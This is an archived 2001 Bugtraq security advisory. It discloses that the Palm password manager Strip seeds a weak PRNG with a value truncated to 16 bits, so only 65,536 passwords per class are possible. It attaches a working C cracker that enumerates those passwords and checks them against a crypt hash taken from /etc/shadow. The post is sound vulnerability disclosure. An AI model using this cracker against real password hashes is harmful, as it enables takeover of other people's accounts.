[20154] in bugtraq
Catastrophic failure of Strip password generation.
daemon@ATHENA.MIT.EDU (Thomas Roessler)
Wed Apr 11 04:53:36 2001
Mail-Followup-To: BUGTRAQ@securityfocus.com, bugs@zetetic.net,
strip-list@zetetic.net, Marc Haber <mh@zugschlus.de>,
Ian Goldberg <iang@cs.berkeley.edu>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
protocol="application/pgp-signature"; boundary="CdrF4e02JqNVZeln"
Content-Disposition: inline
Message-ID: <20010410200533.A19613@sobolev.does-not-exist.org>
Date: Tue, 10 Apr 2001 20:05:33 +0200
Reply-To: Thomas Roessler <roessler@DOES-NOT-EXIST.ORG>
From: Thomas Roessler <roessler@DOES-NOT-EXIST.ORG>
X-To: bugs@zetetic.net, strip-list@zetetic.net
To: BUGTRAQ@SECURITYFOCUS.COM
--CdrF4e02JqNVZeln
Content-Type: multipart/mixed; boundary="M9NhX3UHpAaciwkO"
Content-Disposition: inline
--M9NhX3UHpAaciwkO
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
Executive summary: If you have ever used Strip for the Palm to
generate your passwords, change them. Change them NOW.
Strip (Secure Tool for Recalling Important Passwords) is a nice
encrypted password notebook for the Palm; see
<http://www.zetetic.net/products.html> for details.
Strip-0.5 also features a function for generating passwords, which
certainly has some appeal to anyone who generates passwords
frequently.
However, this function has some flaws, one of which has the effect
to limit the number of different passwords strip can create to 2^16
per class (alphanumeric, alphabetic, numeric, ... with N
characters).
Generating this number of passwords and trying each of them with
crypt(3) is a matter of less than 3 seconds on a current PC running
Linux.=20
The attached program can be used to demonstrate this in the case of
alphanumeric passwords containing 8 characters. Just take your
encrypted, strip-generated password from /etc/shadow, and pass it as
the single command line argument. (Covering the other classes of
passwords strip can generate is left as an exercise.)
The Flaws
- Strip uses the PalmOS SysRandom() function to generate the
passwords. SysRandom() is a very simplistic linear PRNG, which
should most likely not be used for password generation.
- Strip tries to seed this PRNG with the result of TimGetTicks().
TimGetTicks() returns the number of ticks (1 Tick =3D 10ms on
current devices) since the last reset of your Palm. The ticks
counter is not incremented when the device is turned off.
Obviously, small values for the TimGetTicks() result are much more
likely than large values, so an attacker could just start at 0 and
try any possible ticks value. This kind of attack would already
be quite successfull and efficient - at least against any
passwords generated during the first couple of months of regular
use of a PalmOS device after a reboot.
- The actual implementation has a bug which finally limits the
search space to trivial dimensions: TimeGetTicks() returns a 32
bit integer value, and the PRNG expects such a value as its seed.
However, the return value from TimeGetTicks() is stored in a 16
bit Int variable.
Thus, the numbers 0, ..., 0xffff are the only seeds which will
ever be used, limiting the number of possible passwords of any
class to 2^16.
Credits
Thanks to Ian Goldberg for posting his (correct) take at the
SysRandom() function to coderpunks, and to Marc Haber for telling me
about Strip.
Cheers,
--=20
Thomas Roessler <roessler@does-not-exist.org>
--M9NhX3UHpAaciwkO
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="strip-crack.c"
Content-Transfer-Encoding: quoted-printable
/*
* Crack passwords generate by strip ("Secure Tool for Recalling
* Important Passwords") for the Palm; see
* <http://www.zetetic.net/products.html> for details.
*=20
* Copyright (c) 2001 by Thomas Roessler
* <roessler@does-not-exist.org>.
*=20
* Use, distribute and modify freely.
*=20
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <crypt.h>
/* The PalmOS SysRandom() RNG. */
static unsigned int multiplier =3D 22695477;
static unsigned int _seed =3D 0;
short palm_rand (unsigned int new_seed)
{
if (new_seed)
_seed =3D new_seed;
=20
_seed =3D (_seed * multiplier) + 1;
return (short) ((_seed >> 16) & 0x7fff);
}
/*=20
* Strip's password generation algorithm for the alphanumeric case -=20
* you can easily change this to cover the other cases as well.
*/
static char *alphas =3D "abcdefhijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXY=
Z";
static char *numerics =3D "0123456789";
char *possible_password (unsigned int seed, int size)
{
static char pwbuff[1024];
char z[1024];
int i, r;
int valids;
if (size > sizeof (pwbuff))
exit (1);
=20
sprintf (z, "%s%s",numerics, alphas);
valids =3D strlen (z);
=20
r =3D palm_rand (seed);
for (i =3D 0; i < size; i++)
{
r =3D palm_rand (0);
pwbuff[i] =3D z[r % valids];
}
pwbuff[i] =3D '\0';
=20
return pwbuff;
}
/* check all possible passwords */
int main (int argc, char *argv[])
{
int i;
char *pw;
=20
for (i =3D 0; i <=3D 0xffff; i++)
{
pw =3D possible_password ((short) i, 8);
if (!argv[1] || !strcmp (argv[1], crypt (pw, argv[1])))
printf ("%s\n", pw);
}
=20
return 0;
}
--M9NhX3UHpAaciwkO--
--CdrF4e02JqNVZeln
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3in
iQEVAwUBOtNLbdImKUTOasbBAQF66Af/SmMkCcmDpa5TsFIcsNLnAHCUFfiLzTH8
VBgd/sGcI9byqb/+cbXT9pO9o2rC0Ek+pozfTKisQV2IxFV3A+/nk/ROwcpTXTMm
PPqwf2NQn753tdB8GEV8G7kzI1NDAdm79X73xUuwp7NBosS18jiwUV/7HRyAXvws
nDs3QCfeAFid7ou5tfG4blv9VgrDjtn/ecJBRU1MIjdDEezKkLqmSg2qXRQdFZN8
pF+hkJLCo+WRyolmushRTFGJ/pVXG4zh2zhpHnOt/oS0Gf2zIYw1DTGALDBR9fZP
PwHUsS2NTdCB9LGsNjnhnZeSDXR3xUU/q0pGPKWDGl3Vx5saWn40LA==
=3lNS
-----END PGP SIGNATURE-----
--CdrF4e02JqNVZeln--
